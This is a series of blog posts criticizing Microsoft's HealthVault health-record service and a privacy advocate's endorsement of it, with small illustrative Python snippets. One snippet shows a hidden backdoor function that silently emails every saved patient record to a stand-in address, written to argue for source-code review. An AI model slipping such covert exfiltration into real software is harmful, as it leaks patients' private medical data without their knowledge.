HealthVault: Medically, Legally, and Politically Savvy but Technically Uninformed.

Dr. Deborah Peel has endorsed Microsoft’s HealthVault PHR. From the Patient Privacy Rights press release:

PatientPrivacyRights.Org founder, Dr. Deborah C. Peel, will stand with Microsoft in Washington, D.C today at a press conference to announce the launch of HealthVault.

Is Dr. Peel qualified to make this recommendation?

Please take a look at Dr. Deborah Peel’s bio; she has an impressive record in medicine and privacy activism. At least on this bio, however, she lists no formal computer science training. On the same page we find the bios of the other Patient Privacy Rights board members. Note especially the bio of Tina Williamson (use this link, as the one on the bio page is broken), who was formerly the Vice President of Marketing for a dot-com company. If anything, that should count as negative experience for determining the validity of marketing claims against sourcecode. Perhaps the computer science expertise upon which Dr. Peel relies is on staff? Nope, no computer-science-trained staff there either.

According to the Patient Privacy Rights website, there is no electronic security or privacy expert with actual computer science training associated with the Patient Privacy Rights organization. But remember, the Privacy Coalition is much more than just the Patient Privacy Rights group! It is made up of 45 different organizations with interests in patient privacy. Perhaps some of these organizations are informing Dr. Peel’s recommendation of the most abusive, monopolistic software company on the planet as the “leading” caretaker of the American consumer’s healthcare record.

Of the 45 organizations (which are probably great organizations…), only three are technology-oriented. One of them is a meta-blog site called NewsBull. For the moment I will assume that blogging expertise does not necessarily translate into informed insights into the complexities of protecting patient information, so I will exclude the possibility that informed recommendations came from NewsBull.

The other two organizations with a technical focus are the Electronic Privacy Information Center (EPIC) and Computer Professionals for Social Responsibility (CPSR).

From what I can tell, the most technically impressive person at EPIC is Simon Davies; the rest of the staff appear to be well-meaning policy types. I contacted him to see if he was informing Dr. Peel’s recommendation. His reply:

“I’m still looking into this technology and am hoping to find out more details on the security aspects fairly soon…”

Not exactly a glowing endorsement; instead it sounds like the typical statement of someone who recognizes the depth of complexity involved. I doubt that Dr. Peel’s technical assessment was informed by Simon Davies.

CPSR, on the other hand, is clearly the home of some very serious tech talent. CPSR was one of the organizations that fought the Clipper chip nonsense. It is currently led by Annalee Newitz and Fyodor Vaskovich, of nmap fame. These people obviously have enough technical muscle to make definitive statements regarding the security of Microsoft. I am still talking to them, but so far it does not seem like they were consulted; Fyodor’s first response to me began:

“Hi Fred. I wouldn’t trust Microsoft with my health records either….”

Somehow, I doubt that Deborah Peel asked the author of nmap what he thought about a PHR from Microsoft before delivering her unqualified recommendations. The fact that she might have had access to that level of expertise and did not insist on a consultation is pretty shocking. Of course, it takes some insight to know just how important nmap and Fyodor are in security circles.

Why would someone make a recommendation like that without possessing a tremendous amount of technical savvy, or without consulting someone who had it? Only someone who assumed that this was merely a legal/medical/ethical issue rather than a legal/medical/ethical/technical issue. I have a degree in psychology, and it would be the height of hubris for me to question a prescription that Dr. Peel gave to one of her patients. It would be totally unethical for me to recommend specific drugs to a mental health patient, despite the fact that I have some informal on-the-job experience with mental health drugs.

The problem with psychoactive drugs, and with medical information privacy, is that the devil is in the details. If I were forced to choose an anti-depression medication for someone, I would probably choose one that I had worked around a lot, something with a big name that made me and my patients feel more comfortable. Eight times out of ten my prescription might work fine, but I would have no idea why it did not work the other two times, no idea how to determine whether it was working, and no idea what to do to fix it. I have a four-year degree in mental health… what would it take for me to get that last 20% of prescribing potential? I would need two years of undergraduate courses in hard life sciences, followed by four years of medical school and then four years of residency. In short, to move from 80% accuracy in understanding drug impact to something like 98% accuracy takes about a decade (not to mention the time required for board certification). Hardly seems worth it… until you think about how easy it is to kill someone with drugs. Would you want to see someone who was 80% sure that the drugs you were given would not kill you?

Psychiatrists are qualified to make recommendations for mental health drugs, but their medical training does not qualify them to examine source code and determine whether it matches high-level privacy guidelines. Based on my personal experience, it takes at least 7 years to really have a clue about a specific technology area like this. I have been studying this for 13 years now, and I am often humbled when I discover just how little I know about this stuff. Even with over a decade of training I often feel overwhelmed about what I should do, just concerning the technical issues involved. I would never presume to move outside my area of expertise to make clinical decisions.

Dr. Peel should have the same humility when it comes to technical issues. Despite this, Dr. Peel has said, “Microsoft is setting an industry standard for privacy.” I am not the only one who thinks that is ridiculous.

But wait: having expertise in medicine does not exclude expertise in computer science generally or electronic privacy specifically. It is possible to have both skill sets in one person.

What happens when a board-certified psychiatrist also has a master’s in Computer Science? What happens when the same person has spent a decade studying the way information moves in a computer system AND a decade studying medicine? Then they write posts like this one from Dr. Valdes of LinuxMedNews. Granted, I tend to agree with Dr. Valdes on issues like software freedom and ethics in medical computing. Granted, there are experts at Microsoft who would be able to speak intelligently regarding the technical concerns I am raising; many of Microsoft’s experts have experience equivalent to Dr. Valdes’ training. But those experts are not speaking for 45 different organizations with legitimate interests in patient privacy that are endorsing a company with arguably the worst security and privacy track record ever. In short, Dr. Peel is guilty of hubris. While she may have good intentions and clearly has a sincere desire to protect patient privacy, she appears to be well out of her technical depth.

Of course I could be wrong. I have not seen Dr. Peel’s vita. If Dr. Peel will publish her full resume and it contains solid computer-science-based privacy training and experience that she has left off her online biography, I will be happy to retract some of these criticisms. The only other thing that could justify Dr. Peel’s endorsement is a full source-code review by a professional electronic privacy expert. If Dr. Peel can show that she had access to such a review, then I would also be happy to retract some of these criticisms. Finding this article unchanged and unamended implies that my assumptions about Dr. Peel are, in fact, correct.

If HealthVault were to be successful it would be good for Microsoft’s bottom line, but terrible for our culture. Indeed, Dr. Peel is right about one thing: Microsoft would be “leading” us. Those wearing shackles are often led by others.

-Fred Trotter

HealthVault: What to do if Microsoft does nothing

Somehow I doubt that Microsoft will respond to my criticisms. This is what the Free and Open Source community needs to attempt if Microsoft refuses to budge.

We need to write a tool, using the Microsoft HealthVault API, to export the data from HealthVault. Preferably this tool should export to a standard format, but comma-delimited is better than nothing.
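
Here is a minimal sketch of what such a tool might look like, in Python. Everything HealthVault-specific in it is a placeholder assumption (the endpoint URL, the authorization header, the JSON response shape); a real tool would have to be written against the actual HealthVault API documented on MSDN. The point is only to show how little code stands between a hosted record and a portable, comma-delimited copy of it.

```python
import csv
import json
import urllib.request

# NOTE: the URL, auth header, and response shape below are hypothetical
# placeholders; the real HealthVault API (documented on MSDN) differs.
HEALTHVAULT_EXPORT_URL = "https://example.com/healthvault/records"


def fetch_records(auth_token):
    """Pull the record list from the (hypothetical) HealthVault endpoint."""
    request = urllib.request.Request(
        HEALTHVAULT_EXPORT_URL,
        headers={"Authorization": "Bearer " + auth_token},
    )
    with urllib.request.urlopen(request) as response:
        return json.load(response)  # assume a JSON list of flat record dicts


def export_to_csv(records, path="healthvault_export.csv"):
    """Flatten the records into comma-delimited rows; better than nothing."""
    if not records:
        return
    fieldnames = sorted({key for record in records for key in record})
    with open(path, "w", newline="") as handle:
        writer = csv.DictWriter(handle, fieldnames=fieldnames)
        writer.writeheader()
        writer.writerows(records)


if __name__ == "__main__":
    export_to_csv(fetch_records(auth_token="YOUR-TOKEN-HERE"))
```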

If you are an investor who wants to make a business around this tool, please contact me and I will put you in touch with a technical team (not me… I have no interest in this just now). If you are a programmer and you would like to work on this, contact me to be part of the technical team.

When confronted with proprietary software and no alternatives, hack around the problem.

HealthVault: How to fix it

Microsoft often does the wrong thing. But that does not mean they have to. There are three requirements for behaving ethically as a PHR host.

  1. You must release all of the sourcecode to your PHR under a license that qualifies as both “Free (as-in-Freedom-not-price) Software” and Open Source.
  2. You must allow for the export of all data in a standard format like CCR.
  3. If you are going to allow “partners” to use proprietary code (which you should not), you must inform your consumers that the medical data given to those partners could become locked.

Pretty simple. By releasing the sourcecode, Microsoft would ensure that the software could be run without Microsoft’s help. That means that Microsoft might go away in two hundred years or so, but the HealthVault software would not. By allowing consumers to download their data in a standard format, Microsoft would ensure that the data would not be trapped in a proprietary format.
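
To make the second requirement concrete, here is a toy sketch of what a standards-based export might look like. The element names below are simplified placeholders, not the actual CCR schema (the real CCR, ASTM E2369, is far more detailed); the point is simply that the data leaves the system in a documented, open format that any other program can read.

```python
import xml.etree.ElementTree as ET

# Toy sketch of a standards-based export. Element names are simplified
# placeholders; the real CCR (ASTM E2369) schema is far more detailed.
def record_to_xml(record):
    root = ET.Element("ContinuityOfCareRecord")
    patient = ET.SubElement(root, "Patient")
    ET.SubElement(patient, "Name").text = record["name"]
    results = ET.SubElement(root, "Results")
    for test, value in record["results"].items():
        result = ET.SubElement(results, "Result")
        ET.SubElement(result, "Test").text = test
        ET.SubElement(result, "Value").text = str(value)
    return ET.tostring(root, encoding="unicode")


print(record_to_xml({"name": "Jane Doe", "results": {"LDL cholesterol": 128}}))
```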

Recently Microsoft has released two licenses that were approved as open source licenses. These would be ideal for use in this environment.

Will this happen? I think it has a snowball’s chance, but perhaps, if Microsoft does not listen, Google might.

HealthVault: The Food critic never took a bite.

I hope I have made my case that “patient privacy” is complex enough that merely saying “Recognize that patients have the right to medical privacy” is the ethical equivalent of saying “When considering the medical ethical issue of abortion, you must recognize that often women want to get pregnant and have a child.” This is a great example of a statement that sounds good, is completely true, and yet gets us nowhere.

Generally, all of the “Patient Privacy Principles” have this problem. They are great principles, but when you get deeper, down to the level of detail required when implementing software, it is obvious that they are only useful in spirit. For instance:

“Deny employers access to employees’ medical records before informed consent has been obtained”

Sounds good, right? But does that mean that you will require consent to inform the employer of a workers’ compensation injury status? Doesn’t the employer have the right to know the ongoing status of a workplace injury without repeated informed consent? What, exactly, does informed consent mean? When was the last time you started a new job and did not sign all fifteen of the CYA forms that your employer put in front of you? Does that count as informed consent? Again, the spirit of the principle is obviously good, something like “employers should not be able to discriminate against employees based on health information,” but that does not cut it when making software; we have to determine exactly what the system will do and what it will not do in order to write software.

So are the Privacy Principles flawed? Only when their interpretation is left to a private company with no possible way for patients to review how the code actually works!

Deborah Peel’s endorsement of Microsoft’s HealthVault is the equivalent of a food critic looking at a magazine food ad to make a recommendation for a restaurant. Have you ever looked at those ads when you were really hungry? You see the roasted turkey browned to perfection with a pat of butter slowly melting on it. Looks delicious! It is impossible to make that photograph with food that also tastes good. Food photographers work all day on food photographs; they cannot afford to have food that changes in appearance over the course of an hour. Can you imagine trying to include a fresh bowl of guacamole in a picture with ten other foods? Long before the picture was ready, the guacamole would look disgusting. That beautiful turkey browned to perfection is actually a frozen turkey that has had the skin “browned” with a paint remover gun. The pat of butter… well, let’s just say it’s not butter. I know this might seem obvious, but in order to judge the quality of food, a food critic must actually taste the dish.

There is no way that Dr. Peel can verify one way or another that HealthVault works the way Microsoft says it does. For instance, it would be trivial for every new piece of data for every patient to be automatically emailed to Bill Gates, or to Fred Trotter. That “email the record” functionality would change nothing in the appearance of the user interface that Dr. Peel evaluated (I assume she looked at the interface). The only way to sort this out is to examine the sourcecode. Any competent computer scientist would acknowledge that this is trivially true: it is not what Microsoft says that matters, nor is it what the software appears to do. What matters is what the software actually does, and the only way to determine this, one way or another, is to read the sourcecode. There is a long and glorious tradition in the software industry of, shall we say, “fudging” what the software actually does for marketing purposes. Is Dr. Peel qualified to examine this gap between sourcecode and marketing material? More on this issue later.
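
To see why looking at the interface is not enough, consider a deliberately crude sketch. The two functions below present exactly the same behavior to the user interface built on top of them; only reading the source reveals that one of them quietly forwards every record to a hidden recipient. Nothing here is a claim about what HealthVault actually does; the function names, addresses, and mail host are all invented for illustration.

```python
import smtplib
from email.message import EmailMessage

DATABASE = []  # stand-in for the real record store


def save_record(record):
    """What the privacy policy describes: the record is stored."""
    DATABASE.append(record)


def save_record_with_backdoor(record):
    """Same signature, same visible behavior, plus a silent copy by email.
    Purely illustrative; the recipient and mail host are invented."""
    DATABASE.append(record)
    message = EmailMessage()
    message["From"] = "phr@example.com"
    message["To"] = "hidden-recipient@example.com"
    message["Subject"] = "copy of a patient record"
    message.set_content(str(record))
    with smtplib.SMTP("mail.example.com") as server:
        server.send_message(message)
```

A user clicking “Save” sees no difference between the two; only a sourcecode review (or careful network monitoring) would catch the second one.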

-FT

HealthVault: No Commitments and a Sleeping Watchdog.

Has Microsoft committed to keeping the promises that it has already made? No, just the opposite. Their privacy policy concludes: “We may occasionally update this privacy statement.”

Which means that when the commitments that Microsoft has made regarding HealthVault become inconvenient, they will simply change them.

Will the data that you enter into HealthVault be secure? Would my HealthVault data be studied by my insurance company? Would access be limited to those to whom I choose to give it? Thank goodness Microsoft’s answer to these questions was not simply “Trust me”! Instead it is “Trust my auditor.” This is, apparently, enough to satisfy the Patient Privacy Rights Foundation and the Coalition for Patient Privacy. In a recent Patient Privacy Rights press release, Dr. Deborah Peel is quoted:

“Corporate claims to offer privacy mean nothing unless they are willing to take the same steps Microsoft has taken in building HealthVault,” says Peel. Microsoft has committed to independent third party audits to verify their pledge to protect privacy. “Audits are essential,” says Peel. “Technology companies have got to do better than telling consumers to just ‘trust us.’ Consumers shouldn’t trust anyone but themselves to decide who can see and use their sensitive health information.”

Microsoft’s HealthVault Privacy Policy does not have the word “audit” in it anywhere. Apparently Dr. Peel assumes that Microsoft telling her that they will get audits is sufficient to ensure that they will. Interestingly, the only place the Microsoft HealthVault press release mentions audits is when it quotes Peel.

Apparently, this means “trust the auditors.” Of course, we all know how well audits serve to protect the public from unethical corporate behavior. The alternative, which is obviously not being discussed, is the ability to inspect the code for yourself. A top GPL-licensed PHR is IndivoHealth. Let’s do a quick comparison.

Question: PHR Covered by HIPAA?

IndivoHealth: When it is used by a covered entity, yes.

HealthVault: No. Microsoft is not a covered entity.

Question: How is this verifiable? How can you trust that the user really has control? How can you trust that there is no proprietary back door built into the software?

IndivoHealth: Read the IndivoHealth source code yourself. Hire an auditor of your choice to review the sourcecode. Verify that the auditor you hired is telling you the truth by hiring another auditor, again of your choice. Verify that both auditors you chose and hired are not full of… smoke… by reading the source code yourself.

HealthVault: Trust Microsoft. Trust the auditor that Microsoft pays millions of dollars a year to whistle blow on Microsoft.

I think you get the idea. Nonetheless, Deborah Peel is pretty impressed with HealthVault. From a HealthcareITNews article:

“Their model is that consumers truly should control the information and that’s the direction they want to take as a company,” said Peel. “We really think that because they are the industry leader that the rest of industry will have to follow or be left behind.”

Further:

“Microsoft has agreed to adhere to all of the privacy principles that the coalition developed in 2007, ” Peel said. “Not only adhere to them in terms of contracts but to be audited on these principles. We think they’re setting a new amazingly high bar and frankly, we think what they’re doing is really the best practice that the entire industry needs to follow.”

Well, this is good! Microsoft has agreed to follow the privacy principles! Principles are good. What are the principles? We find them at the Patient Privacy Rights website; let’s go through them one at a time.

  • Recognize that patients have the right to medical privacy* (later defined as: “Health information privacy is an individual’s right to control the acquisition, uses, or disclosures of his or her identifiable health data.”)

Microsoft’s privacy policy: “Microsoft is committed to protecting your privacy.” I guess that settles that.

  • Recognize that user interfaces must be accessible so that health consumers with disabilities can individually manage their health records to ensure their medical privacy

Actually, Microsoft deserves credit for generally working hard in this area. Give credit where it is due. However, no commitment is made in the privacy document regarding accessibility.

  • The right to medical privacy applies to all health information regardless of the source, the form it is in, or who handles it

Microsoft’s privacy policy: “This privacy statement applies to the data collected by Microsoft through the Microsoft HealthVault beta version (the “Service”); it does not apply to data collected through other online or offline Microsoft sites, products, or services.” So much for “regardless of the source.” Microsoft’s HealthVault privacy policy contradicts this Privacy Principle.

  • Give patients the right to opt-in and opt-out of electronic system

Microsoft’s policy indicates that users can quit the system and Microsoft will then delete the data after 90 days. So much for seven generations of custodianship, but I guess deleting meets the “opt-out” requirement.

  • Give patients the right to segment sensitive information

No commitment to segmenting information is made in the privacy statement.

  • Give patients control over who can access their electronic health records

HealthVault says that users can appoint “custodians” of their record. Those custodians can then pass this custodian privilege on to others. Ultimately, a HealthVault record can easily pass out of the control of the original owner. That is not to say that this is not a cool feature, but it does not square with the principles. From the HealthVault privacy policy: “Because inappropriate granting of access could allow a grantee to violate your privacy or even revoke your access to your own records, we urge you to consider all the consequences carefully before you grant access to your records.” Microsoft’s HealthVault privacy policy contradicts this Privacy Principle.

  • Health information disclosed for one purpose may not be used for another purpose before informed consent has been obtained

You can give your health information to “Programs” offered by third-party companies. But how will that data be used? From the HealthVault privacy policy: “Please refer to the privacy statements of those Programs for information about their privacy policies, and about how your information will be used by those Programs.” Microsoft’s HealthVault privacy policy contradicts this Privacy Principle.

  • Require audit trails of every disclosure of patient information

Perhaps Microsoft will do this… Microsoft makes no commitment in the privacy policy.

  • Require that patients be notified promptly of suspected or actual privacy breaches

Perhaps Microsoft will do this… Microsoft makes no commitment in the privacy policy.

  • Ensure that consumers can not be compelled to share health information to obtain employment, insurance, credit, or admission to schools, unless required by statute

Whose statutes? If my record is in China, does that government have the right to get to it? Microsoft explicitly states: “Personal information collected on the Service may be stored and processed in the United States or any other country in which Microsoft or its affiliates, subsidiaries, or agents maintain facilities, and by using the Service, you consent to any such transfer of information outside of the U.S.” A US record stored at an offshore site could be compelled by a foreign government. Microsoft’s HealthVault privacy policy contradicts this Privacy Principle.

  • Deny employers access to employees’ medical records before informed consent has been obtained

Perhaps Microsoft will do this… Microsoft makes no commitment in the privacy policy.

  • Preserve stronger privacy protections in state laws

Perhaps Microsoft will do this… Microsoft makes no commitment in the privacy policy.

  • No secret health databases. Consumers need a clean slate. Require all existing holders of health information to disclose if they hold a patient’s health information

Perhaps Microsoft will do this… Microsoft makes no commitment in the privacy policy.

  • Provide meaningful penalties and enforcement mechanisms for privacy violations detected by patients, advocates, and government regulators

Perhaps Microsoft will do this… Microsoft makes no commitment in the privacy policy.

In short, Microsoft’s commitment to follow the principles is a commitment that they have NOT made in their policy. Microsoft is basically saying, “Trust us, this is secure and private.” Everything about Microsoft’s history indicates that such commitments to privacy and security are bogus. What exactly made Dr. Peel conclude that they are the market leader in health record security and privacy? What made her conclude that Microsoft has “committed” to third-party audits?

Perhaps Dr. Peel is discussing a subject as though she were an expert, when in fact she has had little relevant training on the subject.

HealthVault: Abusing vs Implementing Standards.

Microsoft, of all the companies that might consider creating a PHR, is especially problematic. Microsoft has a long history of standards abuse.

Let’s consider an issue parallel to the “personal health record”: personal email. I use Gmail and have used Yahoo Mail in the past, but for this example let’s pretend that I used Hotmail, a Microsoft product. Hotmail users trust Microsoft to protect and store potentially sensitive personal email data. I currently have at least a gigabyte of personal messages in my mail account. At this rate I will have at least 100 gigs of messages, assuming I die of old age. What if my wife (who will likely outlive me, given that she is younger and averse to simple sugars, cholesterol, sodium, and saturated fats in a way that I am not) wanted to ensure that my emails survived Microsoft’s eventual demise? After inheriting my password, my wife could download everything via Hotmail’s POP3 service. She could download my emails into a proprietary package like Outlook or, better yet, a GPL email application. She could transfer them to another service that she trusted, like Gmail.

By leveraging Hotmail’s POP3 interface she would be taking responsibility for the continued storage of my emails, and ensuring that my great-grandkids could know for certain exactly how many times the Nigerians contacted me with a special offer because they trust me so much.
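
For email, the export path really is that simple. Here is a minimal sketch using Python’s standard poplib module; the server name and credentials are placeholders, and Hotmail’s actual POP3 settings may differ, but the shape of the task does not.

```python
import poplib

# Placeholder host and credentials; Hotmail's actual POP3 settings may differ.
server = poplib.POP3_SSL("pop3.example.com")
server.user("fred@example.com")
server.pass_("my-password")

message_count, _mailbox_bytes = server.stat()
for i in range(1, message_count + 1):
    _response, lines, _octets = server.retr(i)  # fetch message i
    raw_message = b"\r\n".join(lines)           # reassemble the raw text
    with open(f"message_{i:05d}.eml", "wb") as handle:  # one standard .eml file each
        handle.write(raw_message)

server.quit()
```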

But what about my HealthVault account? How could my wife ensure that my great-grandkids know about last month’s cholesterol results? Knowing my cholesterol history is going to be vastly more relevant to them than the time and place of last week’s LAN party. To make this possible, Microsoft would have to export the data in a format vastly more complex than email, perhaps something like the Continuity of Care Record (CCR).

The problem with formats like CCR is that they are not strong standards and suffer greatly from the dialect problem. The dialect problem is when the “implementations” of a “standard” differ enough to make them incompatible. When people from Australia, England, and the US speak English to each other they typically understand each other, because the dialects of English are close enough to be compatible. Alternatively, French, Spanish, and Italian could technically be considered “dialects” of Latin, yet obviously speakers of these languages cannot, without translation, understand each other completely. CCR and the other electronic medical languages are currently suffering from the dialect problem. Show me two HL7 implementations and I will show you two systems that cannot communicate without “translation” work. (By the way, the FOSS way to solve this problem is with Mirth, which is an HL7 router.) Protocols that suffer from the dialect problem so badly that they typically cannot communicate effectively without extensive configuration can be thought of as “weak standards.” Protocols that are not negatively impacted by the dialect problem are “strong standards” (good examples of strong standards are the TCP/IP and fax protocols).
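
Here is a contrived illustration of the dialect problem, using two invented HL7 v2-style PID segments. Both are meant to carry the same medical record number, but the two imaginary sending systems put it in different fields, so a receiver written against one dialect silently reads the wrong identifier from the other. This is exactly the gap that a translation layer like Mirth exists to bridge.

```python
# Two invented HL7 v2-style PID segments describing the same patient.
# System A puts the medical record number in PID-3; System B fills PID-2
# and uses PID-3 for an old, retired identifier.
pid_from_system_a = "PID|1||12345^^^HOSP^MR||DOE^JOHN||19600101|M"
pid_from_system_b = "PID|1|12345|54321-OLD^^^HOSP^MR||DOE^JOHN||19600101|M"


def patient_id(pid_segment):
    """A receiver written against System A's dialect: the MRN lives in PID-3."""
    fields = pid_segment.split("|")   # fields[0] is the segment name "PID"
    return fields[3].split("^")[0]    # first component of PID-3


print(patient_id(pid_from_system_a))  # 12345      (the right record)
print(patient_id(pid_from_system_b))  # 54321-OLD  (silently the wrong one)
```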

Microsoft is famous for incorrectly implementing standards and creating new, incompatible dialects. Microsoft has done this even when it flies in the face of a previously strong standard. Then they use their monopoly position to push adoption of their own dialect of the standard. Adoption of the Microsoft dialect then increases the reach and influence of the Microsoft monopoly, which increases Microsoft’s ability to enforce its own dialects, and so on. In fact, when it concerns a previously strong standard, this has famously been called Microsoft’s embrace, extend, and extinguish strategy. If you have no idea what I am talking about, then Google the history of Microsoft’s implementations of Java, Kerberos, and JavaScript.

Not only has Microsoft not committed to implementing, and not abusing, a standard import and export format; it is making moves to create a proprietary standard in place of CCR. HealthVault already has an MSDN page where you can learn how to “interface” with the Microsoft PHR. Microsoft intends to create a community of “Programs” within HealthVault by which third parties can further process medical data. Those programs will interface with HealthVault in a fashion that will create a “de facto standard” that Microsoft will abuse. (For more on this, research the history of the Microsoft Word format, a good example of a Microsoft format that became a de facto standard which Microsoft subsequently abused.)

HealthVault: Failing the seven generations test

(note: This is the first of my “week of HealthVault” articles.)

HealthVault, the new Personal Health Record (PHR) from Microsoft, along with Google’s coming PHR offering, fails the seven generations test.

I did not come up with the idea of “seven generations”; pay attention the next time you go to the grocery store and you might notice a brand of laundry detergent called Seventh Generation. The company behind the product got its name from a suggestion by a Native American employee that it follow the principles that guided the Six Nations Iroquois Confederacy. The council of the Iroquois considered how any decision would impact the next seven generations. Let’s see how that principle applies to health IT.

My mother died of ovarian cancer. My grandmother took a drug while my mother was in utero that increased the chances that my mother would get ovarian cancer. Any consideration given to my mother’s genetic propensity to get cancer must take into account this environmental influence. My daughters and granddaughters will inherit my genes, and perhaps some risks for ovarian cancer that my mother passed on to me. As my granddaughters make life choices based on their genetic propensities, they must take my grandmother’s medical records into consideration. My grandmother’s medical record will remain relevant for at least five generations.

Let’s consider DNA. Our understanding of DNA is only relevant in the context that DNA causes health conditions in the real world. We will not be able to understand DNA sequences fully until we have compared them to medical records over the course of several generations. My great-great-grandchildren need copies of both my medical records and my DNA sequence. Until we can pass these kinds of insights to our progeny, we will not have realized the potential of DNA research.

How long should we be keeping our electronic medical records? We should ensure that they are available for the next seven generations. Assuming one generation lasts 100 years, that means 700 years of storing digital records. Many academics think that a “generation” should be defined as 20 years, but that does not work here: if I develop arthritis in my 20s, that fact is medically relevant for my great-great-great-grandchildren in their 90s. One hundred years is a whole lifetime and also makes for easy math. In any case, all of my points are still relevant if one counts a generation as 20 years or 50 years instead of 100.

A private, for-profit corporation is an inappropriate storehouse for records that the next seven generations will need. Corporations do not last long enough. Consider the Dow Jones Industrial Average. Of the original 12 companies that made up the index, only one is still listed: GE. Some of those original companies were taken private, some were merged, some were destroyed. That is the course of the largest companies in the United States over a little more than 100 years. The Honourable East India Company was founded in 1600 and dissolved in 1858. In 1700, however, it was one of the most trusted companies in the world, with a monopoly on par with Microsoft’s. Now the East India Company is no more. Someday Microsoft will go away too. Perhaps Google will buy it in 150 years; perhaps it will go bankrupt in 200 years. In any case, Microsoft will not be in business in 700 years. If Google had released its PHR first, this article would have been about them. The Google “do no evil” motto is probably the best corporate motto I have ever heard of! Further, it is obvious that Google takes this very seriously, as evidenced by their refusal to offer email service in China, a decision that will eventually cost them billions but separates them from Microsoft and Yahoo. They still censor in China, but at least Google is thinking about the problem in the right way: from a moral perspective.

However, the Google motto is not “do no evil for the next 700 years.” This is not about which company is acceptable for the stewardship of medical records. NO company is qualified. Even Google will not be around in 700 years.

But this is still Microsoft we are talking about, which, all things being equal, is especially bad. Microsoft has a history of abusing standards, and of using those abuses to enable and extend its monopolies. In short, they have a history of “being evil” in exactly the sort of way that we cannot afford to have impact our healthcare records.